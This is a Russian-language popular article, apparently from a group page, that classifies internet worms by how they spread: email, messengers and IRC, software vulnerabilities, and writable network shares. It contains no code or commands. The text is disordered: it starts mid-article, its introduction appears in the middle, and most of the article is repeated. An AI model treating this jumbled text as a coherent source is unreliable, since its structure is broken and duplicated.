Черви, распространяющиеся с помощью электронной почты, делают это по-разному. Чаще всего файл, содержащий код зловредной программы, отправляется прямо в письме в качестве вложения. При этом пользователь должен сам запустить его на исполнение. Для этого применяются различные приемы: двойные расширения файлов, привлекательные сопроводительные тексты и т. д. Впрочем, некоторые вирусы даже не нужно активировать. Эти зловредные программы используют уязвимости почтового клиента Microsoft Outlook и запускаются сами (они представляют собой скрипты, встроенные в HTML-страницы).
Но в последнее время большинство пользователей уже знают, чем им грозит запуск файлов, пришедших по электронной почте. Так что на различные уловки вирусописателей попадаются все меньше и меньше людей. Поэтому злоумышленники стали применять другой способ распространения червей. Они высылают в электронных письмах не сами файлы, а всего лишь безобидные на первый взгляд ссылки, при переходе по которым пользователю предлагается загрузить какой-то архив или документ. Нужно ли говорить, что данный объект будет содержать вирус. Кроме того, нельзя забывать, что в последнее время были обнаружено несколько серьезных уязвимостей в браузерах. Так что получить на компьютер вирус можно, даже просто открыв для просмотра специальным образом сформированную веб-страницу.
Для распространения себя, то есть для отправки зараженных электронных писем, черви используют разные приемы. Так, например, некоторые зловредные программы имеют встроенные модули работы с SMTP-серверами. Таким образом, они сами могут отправлять почту. Другие применяют для этого стандартные функции операционных систем типа Windows MAPI. Но все-таки чаще всего вирусы используют различные дыры в программном обеспечении, в частности в почтовых клиентах.
Отдельного упоминания заслуживает процесс поиска вирусами своих жертв. Вообще, существует множество способов, с помощью которых червь может получить реально существующие адреса электронной почты. Чаще всего для этого используется адресная книга почтового клиента. Вирус просто просматривает ее и отправляет свои копии по всем найденным адресам. Другим вариантом поиска жертв является просмотр всех писем из почтового ящика и выделение из них данных отправителей. Кроме того, существуют и достаточно экзотические варианты. Например, некоторые черви ищут все сохраненные на жестком диске HTML-странички и просматривают их, вылавливая адреса электронной почты. Ну и, конечно же, интернет-черви для поиска своих жертв могут использовать не один, а сразу два, три и даже больше различных способов.
Черви, распространяющиеся с помощью программ для общения
Сегодня все большее и большее признание получают различные способы моментального общения. Наиболее распространенным из них являются интернет-пейджеры, то есть программы наподобие ICQ. Также немало людей пользуется IRC-каналами. Причем количество как первых, так и вторых постоянно растет. И вместе с ним растет и число червей, распространяющихся с помощью этих программ.
В принципе эти вирусы очень сильно напоминают почтовые черви. Для своего распространения они чаще всего используют ссылки на зараженные объекты. Некоторые из них пытаются отправлять файлы с кодом вируса, но в данном случае этот вариант малоэффективен. В программах для общения для пересылки файла требуется подтверждение принимающей стороны. А уговорить человека сделать это программа, естественно, не может. Поэтому таким способом чаще всего злоумышленники вручную распространяют троянских коней. Адреса новых жертв черви могут получить только из существующего списка контактов, других вариантов здесь не существует.
Самостоятельно распространяющиеся черви
Далеко не все интернет-черви распространяются с помощью каких-либо программ. Есть вирусы, которые самодостаточны и не требуют никаких помощников. Способов такого распространения существует немало. Но наибольшую известность получили только два из них. Первый - это использование уязвимостей в программном обеспечении. То есть червь каким-либо способом ищет компьютеры, в защите которых есть определенная дыра. Далее он использует заложенный в него создателями эксплойт (способ использования уязвимости), который обычно представляет собой специально сгенерированный сетевой пакет или запрос, и проникает в систему. Причем чаще всего таким образом заражают компьютеры не сами вирусы, а только их загрузчики. После своей установки зловредная программа связывается с каким-то сервером и загружает на компьютер непосредственно код червя. Таким образом незаметно от пользователя могут распространяться даже относительно большие по объему вирусы.
Другой способ самостоятельного распространения интернет-червей - поиск компьютеров с открытыми на запись ресурсами. Делают это вирусы по-разному. Некоторые просто перебирают доступные в "Сетевом окружении" зараженной системы папки, другие используются полноценный поиск в Глобальной сети, третьи применяют заданный диапазон IP-адресов. После обнаружения открытого для записи ресурса червь копирует туда свое тело. Правда, запустить себя на исполнение на удаленной машине чаще всего зловредная программа не может. Однако всегда остается шанс того, что пользователь найдет новую программу или какой-то другой файл на своем винчестере, не вспомнит его и запустит, чтобы просто посмотреть, что это такое.
Подводим итоги
Итак, мы с вами, уважаемые читатели, только что кратко рассмотрели наиболее распространенные типы интернет-червей. Правда, стоит отметить, что приведенная классификация не полна. Слишком уж много существует сегодня сетевых вирусов. Они есть практически для всех существующих служб и сервисов: электронной почты, интернет-пейджеров, IRC-каналов, P2P-сетей, веб-серверов, FTP-серверов и т. д. А поэтому антивирусное программное обеспечение, осуществляющее постоянный мониторинг системы, обязательно для каждого компьютера, который работает с Интернетом.
Главным признаком интернет-червей является среда их распространения. В принципе она ясна прямо из названия: эти зловредные программы размножаются с помощью Глобальной сети. Впрочем, делают это они по-разному. Некоторые используют для распространения электронную почту, другие - средства сетевого общения, третьи просто "пролазят в дырки" системы защиты. Помимо этого сетевым червям присущи некоторые другие особенности: полиморфизм, невидимость, разные способы внедрения в систему жертвы и т. д. Однако определяющей особенностью, на которой построена система классификации интернет-червей, остается все-таки способ распространения. И сейчас мы с вами, уважаемые читатели, рассмотрим наиболее распространенные типы этих зловредных программ.
Черви, распространяющиеся с помощью электронной почты
Современный Интернет просто-напросто невозможно представить себе без электронной почты. Более того, именно этот сервис, который позволяет людям, живущим на разных концах земного шара, общаться друг с другом, дал изначальный толчок развития Глобальной сети. И сегодня у каждого интернетчика есть ящик электронной почты, причем чаще всего не один. А поэтому нет ничего удивительного в том, что создатели вирусов обратили свое внимание на данный сервис.
Черви, распространяющиеся с помощью электронной почты, делают это по-разному. Чаще всего файл, содержащий код зловредной программы, отправляется прямо в письме в качестве вложения. При этом пользователь должен сам запустить его на исполнение. Для этого применяются различные приемы: двойные расширения файлов, привлекательные сопроводительные тексты и т. д. Впрочем, некоторые вирусы даже не нужно активировать. Эти зловредные программы используют уязвимости почтового клиента Microsoft Outlook и запускаются сами (они представляют собой скрипты, встроенные в HTML-страницы).
Но в последнее время большинство пользователей уже знают, чем им грозит запуск файлов, пришедших по электронной почте. Так что на различные уловки вирусописателей попадаются все меньше и меньше людей. Поэтому злоумышленники стали применять другой способ распространения червей. Они высылают в электронных письмах не сами файлы, а всего лишь безобидные на первый взгляд ссылки, при переходе по которым пользователю предлагается загрузить какой-то архив или документ. Нужно ли говорить, что данный объект будет содержать вирус. Кроме того, нельзя забывать, что в последнее время были обнаружено несколько серьезных уязвимостей в браузерах. Так что получить на компьютер вирус можно, даже просто открыв для просмотра специальным образом сформированную веб-страницу.
Для распространения себя, то есть для отправки зараженных электронных писем, черви используют разные приемы. Так, например, некоторые зловредные программы имеют встроенные модули работы с SMTP-серверами. Таким образом, они сами могут отправлять почту. Другие применяют для этого стандартные функции операционных систем типа Windows MAPI. Но все-таки чаще всего вирусы используют различные дыры в программном обеспечении, в частности в почтовых клиентах.
Отдельного упоминания заслуживает процесс поиска вирусами своих жертв. Вообще, существует множество способов, с помощью которых червь может получить реально существующие адреса электронной почты. Чаще всего для этого используется адресная книга почтового клиента. Вирус просто просматривает ее и отправляет свои копии по всем найденным адресам. Другим вариантом поиска жертв является просмотр всех писем из почтового ящика и выделение из них данных отправителей. Кроме того, существуют и достаточно экзотические варианты. Например, некоторые черви ищут все сохраненные на жестком диске HTML-странички и просматривают их, вылавливая адреса электронной почты. Ну и, конечно же, интернет-черви для поиска своих жертв могут использовать не один, а сразу два, три и даже больше различных способов.
Черви, распространяющиеся с помощью программ для общения
Сегодня все большее и большее признание получают различные способы моментального общения. Наиболее распространенным из них являются интернет-пейджеры, то есть программы наподобие ICQ. Также немало людей пользуется IRC-каналами. Причем количество как первых, так и вторых постоянно растет. И вместе с ним растет и число червей, распространяющихся с помощью этих программ.
В принципе эти вирусы очень сильно напоминают почтовые черви. Для своего распространения они чаще всего используют ссылки на зараженные объекты. Некоторые из них пытаются отправлять файлы с кодом вируса, но в данном случае этот вариант малоэффективен. В программах для общения для пересылки файла требуется подтверждение принимающей стороны. А уговорить человека сделать это программа, естественно, не может. Поэтому таким способом чаще всего злоумышленники вручную распространяют троянских коней. Адреса новых жертв черви могут получить только из существующего списка контактов, других вариантов здесь не существует.
Самостоятельно распространяющиеся черви
Далеко не все интернет-черви распространяются с помощью каких-либо программ. Есть вирусы, которые самодостаточны и не требуют никаких помощников. Способов такого распространения существует немало. Но наибольшую известность получили только два из них. Первый - это использование уязвимостей в программном обеспечении. То есть червь каким-либо способом ищет компьютеры, в защите которых есть определенная дыра. Далее он использует заложенный в него создателями эксплойт (способ использования уязвимости), который обычно представляет собой специально сгенерированный сетевой пакет или запрос, и проникает в систему. Причем чаще всего таким образом заражают компьютеры не сами вирусы, а только их загрузчики. После своей установки зловредная программа связывается с каким-то сервером и загружает на компьютер непосредственно код червя. Таким образом незаметно от пользователя могут распространяться даже относительно большие по объему вирусы.
Другой способ самостоятельного распространения интернет-червей - поиск компьютеров с открытыми на запись ресурсами. Делают это вирусы по-разному. Некоторые просто перебирают доступные в "Сетевом окружении" зараженной системы папки, другие используются полноценный поиск в Глобальной сети, третьи применяют заданный диапазон IP-адресов. После обнаружения открытого для записи ресурса червь копирует туда свое тело. Правда, запустить себя на исполнение на удаленной машине чаще всего зловредная программа не может. Однако всегда остается шанс того, что пользователь найдет новую программу или какой-то другой файл на своем винчестере, не вспомнит его и запустит, чтобы просто посмотреть, что это такое.
Подводим итоги
Итак, мы с вами, уважаемые читатели, только что кратко рассмотрели наиболее распространенные типы интернет-червей. Правда, стоит отметить, что приведенная классификация не полна. Слишком уж много существует сегодня сетевых вирусов. Они есть практически для всех существующих служб и сервисов: электронной почты, интернет-пейджеров, IRC-каналов, P2P-сетей, веб-серверов, FTP-серверов и т. д. А поэтому антивирусное программное обеспечение, осуществляющее постоянный мониторинг системы, обязательно для каждого компьютера, который работает с Интернетом.
Метки: настройки
В этой группе, возможно, есть записи, доступные только её участникам.
Чтобы их читать, Вам нужно вступить в группу
Чтобы их читать, Вам нужно вступить в группу